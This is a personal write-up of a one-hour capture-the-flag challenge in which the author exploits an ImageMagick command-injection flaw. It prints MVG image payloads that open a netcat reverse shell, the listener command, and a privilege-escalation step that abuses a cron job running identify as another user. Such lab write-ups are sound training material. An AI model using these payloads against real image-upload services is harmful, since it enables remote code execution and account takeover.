I solved a word find puzzle posted in the GPEN newsletter from Ed Skoudis and got a password for this challenge. It was invite only this time, because they wanted to test it out first. It's just like it says it is. It is a one hour long ctf. Once I was able to start, I enjoyed it. I had getting connected for much of it. It would let me connect for about a second, and then I would be prompted with an error, and it gave the option to reconnect. Even though I kept trying, it would keep throwing that error. I tried stop and restarting the VM like they said to do, and still had the same problem. They said that we needed port 8080 open. My firewall shouldn't block outgoing ports, so I was fairly certain that that wasn't the issue. Note to guys running this, in case others have a similar issue: I ended up logging out of that user account completely-it was a very restricted standard user account on my Mac, that I use for ctfs. I logged into the less restricted standard user account and I could log on just fine. I don't know if they just happened to fix it right at the time, and it was just coincidence, but just in case it wasn't, here is one possible solution to future connection issues.
I knew what the challenge was about because they gave slides saying what it covered beforehand. I attempted to do some of the exploits with my own vm yesterday. The specific example that was needed to solve the challenge worked fine on my vm.
Also, the time could have been better. My children were asking me for things the whole time and fighting. Oh joy. Not the organizer's fault, though.
I had about 10 minutes left to try the challenge, before the competition was over. The creators were kind enough to give a walk-through to show us how the first problem was solved. So, I got the first flag after the challenge was over. I was annoyed because had the right idea. Apparently, their system did not like where I had the quote. A friend told me, welcome to hacking ;). (He meant in the context that things do not always work the way that they did before.)
The exploit that I used yesterday: (Saved as an ncexploit.mvg file) The nc... part is called a net cat reverse shell. You can accomplish without using the -e by reading Ed Skoudis' article on the SANS Pen Testing Blog about Reverse Shells Without the -e.
push graphic-context
view box 0 0 640 480
fill 'url(https:localhost";nc 127.0.0.1 42000 "-e /bin/bash)'<--yes, it worked without the slashes. I don't know why.
pop graphic-context
First Flag:
The exploit that I had to use today: (Saved as a ncexploit.png file)<-- image magick figures out the file based on magic numbers, not extension, so this works just fine.
push graphic-context
view box 0 0 640 480
fill 'url(https://www.timgur.com";nc 10.0.11.51 42000 -e /bin/bash")'
pop graphic-context
I ran a listener on my machine to catch that shell that would be sent back to me.
Hacker Machine
nc -nlvp 42000
I uploaded the ncexploit.png image to www.timgur.com by clicking on the file upload button and choosing my current directory and ncexploit.png from the list.<--the www.timgur.com in the competition, not the real one. I do not hack without permission.
VictimReverseShell>HackerMachine
whoami
www-data
pwd
var/www/html/images<--I don't really remember if this is where I was. Should have taken pics.
cd ..<--had to do this like 2-3 times.
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
src
sys
timsnotespart1.txt<-- this is where the flag was.
tmp
usr
var
cat timesnotespart1.txt
<nice story, ascii picture, flag: tim_is_a_wizard
Second Flag:
I didn't get this. Had the pieces, didn't know how to put them together. After the challenge, a friend was kind enough to explain it to me.
cat /etc/crontab
tim /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/identify images/incoming/*.png >> /var/log/img_check.log
So what this is doing is using the identify command on every single png image that it placed in the /var/log/img_check.log file. I knew that much, however, what to do with it was another matter. The idea is to get access to the box with tim's user account. Considering that I already had access to the box, I could move files around and manipulate it with my current user's permissions. In order for this to work, on the hacker box, you must have a listener running on the same port as the exploit nc reverse shell, nc -nvlp 42000.
Hacker Machine:
nc reverse shell, nc -nvlp 42000.
VictimReverseShell>HackerMachine
cp ncexploit.png /opt/images/incoming/ncexploit.png
ls /opt/images/incoming
ncexploit.png
self-portrait.png
The machine connected back to me because it was the exploit that I used to gain access to the box in the first place, the one with the nc reverse shell.
VictimReverseShell>HackerMachine
whoami
tim
ls
timsnotespart2.txt
<story, ascii scary looking guy, ascii bunny, Flag: you_are_the_wizard_now>
Overall, I liked the challenge. They gave us an opportunity to learn something new, and they gave us a chance to practice what we learned afterwards. The time was a little tight, considering that some of it was spent in explaining the challenge, but if I didn't have connection issues, it may have been just right. I look forward to the next one.
UPDATE:
Someone asked how I knew that the exploit worked on my local machine. I had an "attacking" directory, and a "victim" directory. Whenever the machine connected back to my "attacking" directory, if I use the "pwd" command in the "attacking" directory, it told what directory I was in, i.e. "victim". If I used "ls", it listed the contents of the "victim" directory. Also, there was also no visible shell when it connected back. If you've ever done nc, and receive a remote shell, the prompt itself doesn't show up. You just type in commands like, ls, and it will show the contents of the directory that you are in. At least that is what happens with mine. If you're in a normal shell, you'll see the prompt. I will do it again later, take pics and post them. Hopefully this makes sense.
Yes I used a netwars image. I knew that I had the tools that I needed on there. Kali would've done fine, probably. I think that I had the directories backwards, but same idea. Still shows that I was working from a different directory than I was in once the reverse shell kicked in.